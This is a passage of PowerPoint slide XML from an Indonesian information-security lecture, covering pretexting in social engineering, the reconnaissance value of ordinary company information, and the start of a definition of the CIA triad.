              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pretexting. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meyakinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintimidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyamar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rincian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditiru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didedikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegiatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didirikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembelian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menembus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peniruan</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1592481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Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (infosec) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengolahannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat-sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Triad CIA:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang-orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
